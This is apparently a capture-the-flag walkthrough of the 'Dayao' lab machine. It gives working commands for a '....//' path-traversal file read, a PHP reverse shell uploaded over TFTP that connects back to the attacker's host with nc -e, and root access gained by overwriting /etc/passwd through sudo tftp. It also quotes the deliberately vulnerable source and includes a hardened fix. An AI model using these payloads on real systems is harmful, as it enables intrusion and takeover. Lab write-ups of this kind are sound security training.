MazeSec-Dayao-Walkthrough
城南花已开 Lv6

Information gathering

Service discovery

sudo arp-scan -l
[sudo] password for Pepster:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1 00:50:56:c0:00:08 VMware, Inc.
192.168.60.2 00:50:56:e4:1a:e5 VMware, Inc.
192.168.60.197 08:00:27:28:d7:cf PCS Systemtechnik GmbH
192.168.60.254 00:50:56:ef:12:9a VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.027 seconds (126.30 hosts/sec). 4 responded
export ip=192.168.60.197
❯ rustscan -a $ip
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
RustScan: Where scanning meets swagging. 😎

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.197:22
Open 192.168.60.197:80
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-27 08:21 CST
Initiating ARP Ping Scan at 08:21
Scanning 192.168.60.197 [1 port]
Completed ARP Ping Scan at 08:21, 0.07s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 08:21
Completed Parallel DNS resolution of 1 host. at 08:21, 0.00s elapsed
DNS resolution of 1 IPs took 0.00s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 08:21
Scanning 192.168.60.197 [2 ports]
Discovered open port 80/tcp on 192.168.60.197
Discovered open port 22/tcp on 192.168.60.197
Completed SYN Stealth Scan at 08:21, 0.04s elapsed (2 total ports)
Nmap scan report for 192.168.60.197
Host is up, received arp-response (0.00045s latency).
Scanned at 2025-05-27 08:21:59 CST for 0s

PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 64
80/tcp open http syn-ack ttl 64
MAC Address: 08:00:27:28:D7:CF (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.29 seconds
Raw packets sent: 3 (116B) | Rcvd: 3 (116B)

Directory enumeration

❯ gobuster dir -u "http://$ip" -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x php,html,zip,txt -b 404,403
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.60.197
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes: 404,403
[+] User Agent: gobuster/3.6
[+] Extensions: php,html,zip,txt
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html (Status: 200) [Size: 2078]
/uploads (Status: 301) [Size: 318] [--> http://192.168.60.197/uploads/]
/upload.php (Status: 200) [Size: 0]
/file.php (Status: 200) [Size: 0]
Progress: 1038215 / 1038220 (100.00%)
===============================================================
Finished
===============================================================

file.php answers 200 with an empty body, which suggests it expects a parameter; the name makes it a candidate for LFI-style file reading.

Fuzz the parameter name.

Plain `../` payloads never produced a hit; only the doubled form `....//` got through, so the backend apparently strips `../`.

❯ wfuzz -c  -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u "http://$ip/file.php?FUZZ=....//....//....//....//etc/passwd" --hw 0
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************

Target: http://192.168.60.197/file.php?FUZZ=....//....//....//....//etc/passwd
Total requests: 220559

=====================================================================
ID Response Lines Word Chars Payload
=====================================================================

000000759: 200 27 L 40 W 1450 Ch "file"
/usr/lib/python3/dist-packages/wfuzz/wfuzz.py:80: UserWarning:Finishing pending requests...
^C
Total time: 11.87149
Processed Requests: 1830
Filtered Requests: 1829
Requests/sec.: 154.1507

The passwd file shows a user wujing:

❯ curl -s "http://192.168.60.197/file.php?file=....//....//....//....//etc/passwd" |grep /bin/bash
root:x:0:0:root:/root:/bin/bash
wujing:x:1000:1000:,,,:/home/wujing:/bin/bash

I tried a php://filter wrapper to read the upload.php source, without success.

TFTP file upload

/etc/passwd also contains a tftp user, which suggests a TFTP service, normally listening on UDP 69.


Scan UDP 69 with nmap.

It comes back open|filtered: a UDP port that does not answer the probe is indistinguishable from one a firewall is dropping, so nmap cannot decide, and the service has to be confirmed by actually talking TFTP to it.

❯ nmap -sU -sV --version-intensity 0 -n  -T4 $ip -p69
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-27 09:28 CST
Nmap scan report for 192.168.60.197
Host is up (0.00048s latency).

PORT STATE SERVICE VERSION
69/udp open|filtered tftp
MAC Address: 08:00:27:28:D7:CF (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.58 seconds

TFTP has no login: it is a stateless, unauthenticated protocol, and it has no directory listing either, so you cannot browse the server; you can only read or write file names you already know.

Metasploit's auxiliary/admin/tftp/tftp_transfer_util module can check whether the server accepts uploads (a write request, WRQ):

msf6 auxiliary(admin/tftp/tftp_transfer_util) > set RHOST 192.168.60.197
RHOST => 192.168.60.197
msf6 auxiliary(admin/tftp/tftp_transfer_util) > set FILEDATA <?php `busybox nc 192.168.60.100 4444 -e /bin/bash`;?>
FILEDATA => <?php `busybox nc 192.168.60.100 4444 -e /bin/bash`;?>
msf6 auxiliary(admin/tftp/tftp_transfer_util) > set FILENAME rev.php
FILENAME => rev.php
msf6 auxiliary(admin/tftp/tftp_transfer_util) > run

[*] Sending 'DATA:<?php `busybox nc 192.168.60.100 4444 -e /bin/bash`;?>' to 192.168.60.197:69 as 'rev.php'
[+] 192.168.60.197:69 WRQ accepted, sending the file.
[+] 192.168.60.197:69 Sending 54 bytes (1 blocks)
[+] 192.168.60.197:69 Transferred 54 bytes in 1 blocks, upload complete!
[*] 192.168.60.197:69 TFTP transfer operation complete.
[*] Auxiliary module execution completed

Requesting http://$ip/rev.php then triggers the reverse shell: the file TFTP wrote landed in the web root and was executed as PHP.

User privilege escalation

Listener

❯ penelope.py
[+] Listening for reverse shells on 0.0.0.0:4444 → 127.0.0.1 • 192.168.60.100
➤ 🏠 Main Menu (m) 💀 Payloads (p) 🔄 Clear (Ctrl-L) 🚫 Quit (q/Ctrl-C)
[+] Got reverse shell from Dayao-192.168.60.197-Linux-x86_64 😍️ Assigned SessionID <1>
[+] Attempting to upgrade shell to PTY...
[+] Shell upgraded successfully using /usr/bin/python3! 💪
[+] Interacting with session [1], Shell Type: PTY, Menu key: F12
[+] Logging to /home/Pepster/.penelope/Dayao~192.168.60.197_Linux_x86_64/2025_05_27-09_47_45-863.log 📜
───────────────────────────────────────────────────────────────────────────
www-data@Dayao:/var/www/html$ cat file.php
<?php
// vuln.php
if(isset($_GET['file'])) {
$file = $_GET['file'];
// strip ../ to block directory traversal (flaw left in on purpose)
$file = str_replace('../', '', $file);
// read the file with file_get_contents
echo file_get_contents('/var/www/html/'.$file);
}
?>

Looking at the source explains both earlier observations.

file_get_contents prepends /var/www/html/ to the parameter, so a php://filter wrapper never sits at the start of the path and cannot be used to read the source (this is an arbitrary file read, not an include). The filter itself is a single, non-recursive str_replace of `../`, so `....//` loses one `../` and collapses into a fresh `../`.
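To make the two points concrete, the following added example (not code from the walkthrough) models the PHP lines shown above in Python: the single-pass `str_replace('../', '', $file)`, the `/var/www/html/` prefix that file_get_contents receives, and the path the kernel finally opens. Next to it sits a hardened resolver that normalises first and then checks containment instead of blacklisting a substring. WEBROOT and the sample inputs are assumptions for the demo; note that without the flawed filter `....//` is just an odd directory name and not a traversal at all.

```python
"""Model of file.php's traversal filter, and a hardened resolver (added example)."""
import os

WEBROOT = "/var/www/html"  # assumed web root, matching the PHP source above


def vulnerable_filter(user_path: str) -> str:
    # str_replace deletes every '../' in a single left-to-right pass and never
    # rescans, so the pieces left behind by '....//' join up into a fresh '../'.
    return user_path.replace("../", "")


def vulnerable_path(user_path: str) -> str:
    # What file_get_contents actually receives: the web root glued to the front.
    # A php://filter/... wrapper therefore becomes '/var/www/html/php://filter/...'
    # and is treated as a plain (nonexistent) path, which is why that trick failed.
    return WEBROOT + "/" + vulnerable_filter(user_path)


def vulnerable_resolve(user_path: str) -> str:
    # The '..' components are collapsed by the kernel, so this is the file really opened.
    return os.path.normpath(vulnerable_path(user_path))


def traversal_payload(target: str, depth: int = 3) -> str:
    # Each '....//' loses one '../' to the filter and leaves '../' behind.
    return "....//" * depth + target.lstrip("/")


def safe_resolve(user_path: str, webroot: str = WEBROOT):
    """Hardened version: resolve the full path first, then require it to stay under webroot.
    Returns the resolved path, or None when the request escapes the web root."""
    root = os.path.realpath(webroot)
    candidate = os.path.realpath(os.path.join(root, user_path.lstrip("/")))
    if os.path.commonpath([root, candidate]) != root:
        return None  # caller should answer 400/404, never fall through to file_get_contents
    return candidate


if __name__ == "__main__":
    for p in ("../../../etc/passwd", traversal_payload("/etc/passwd")):
        print("%-30s -> filtered %-22s -> opens %s" % (p, vulnerable_filter(p), vulnerable_resolve(p)))
        print("%-30s -> hardened %s" % (p, safe_resolve(p)))
```

The hardened resolver deliberately applies no blacklist: it lets the operating system normalise the path and then refuses anything whose real path is not under the web root, so both the plain and the doubled form are handled the same way.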

TFTP configuration

www-data@Dayao:/opt$ cat /etc/default/tftpd-hpa
TFTP_USERNAME="tftp"
TFTP_DIRECTORY="/var/www/html"
TFTP_ADDRESS="0.0.0.0:69"
TFTP_OPTIONS="--secure --create"

--secure chroots tftpd into TFTP_DIRECTORY and --create lets a WRQ create files that do not exist yet; with TFTP_DIRECTORY pointing at the web root, anyone who can reach UDP 69 can drop a PHP file into the site, which is exactly what happened above.

Nothing else stood out, so upload pspy64 and watch for cron jobs.

2025/05/26 22:07:01 CMD: UID=0     PID=1775   | /usr/sbin/CRON -f
2025/05/26 22:07:01 CMD: UID=0 PID=1776 | /usr/sbin/CRON -f
2025/05/26 22:07:01 CMD: UID=1000 PID=1777 | /bin/sh -c nc -e /bin/bash 127.0.0.1 1234

Cron runs `nc -e /bin/bash 127.0.0.1 1234` as UID 1000 (wujing), a reverse shell to localhost. Listening on port 1234 on the box itself catches it and yields a shell as wujing.

Upgrade the TTY:

www-data@Dayao:/tmp$ busybox nc -lp 1234
id
uid=1000(wujing) gid=1000(wujing) groups=1000(wujing)
script -qc /bin/bash
wujing@Dayao:~$ ^Z
[1]+ Stopped busybox nc -lp 1234
www-data@Dayao:/tmp$ stty raw -echo;fg
busybox nc -lp 1234
reset
reset: unknown terminal type unknown
Terminal type? xterm

Root privilege escalation

With a full shell as wujing:

sudo -l shows wujing may run tftp as root without a password.

wujing@Dayao:~$ cat user.txt
flag{user-c7279ae7-37d3-11f0-89d7-000c2955ba04}
wujing@Dayao:~$ sudo -l
Matching Defaults entries for wujing on Dayao:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User wujing may run the following commands on Dayao:
(ALL) NOPASSWD: /usr/bin/tftp

Because TFTP_DIRECTORY is /var/www/html, copy /etc/passwd there and append a line for a new UID 0 user. Its second field holds a crypt(3) hash for a password you choose (generated with openssl passwd or mkpasswd, for instance); since the field is not `x`, login uses that hash directly and never consults /etc/shadow.

Then run `sudo tftp 127.0.0.1` from /etc: `get passwd` fetches the modified copy from the TFTP root and, because the client runs as root and writes into its current directory, overwrites /etc/passwd.

wujing@Dayao:~$ cd /var/www/html/
wujing@Dayao:/var/www/html$ cp /etc/passwd .
wujing@Dayao:/var/www/html$ echo 'primary:zSZ7Whrr8hgwY:0:0::/root:/bin/bash'>>passwd
wujing@Dayao:/var/www/html$ cd /etc/
wujing@Dayao:/etc$ sudo /usr/bin/tftp 127.0.0.1
tftp> get passwd
Received 1521 bytes in 0.0 seconds
tftp> q

Now switch to the new user with the password behind that hash:

wujing@Dayao:/etc$ su primary
Password:
root@Dayao:/etc# id
uid=0(root) gid=0(root) groups=0(root)
root@Dayao:/etc# cat /root/root.txt
flag{root-e6328734-37d3-11f0-af3b-000c2955ba04}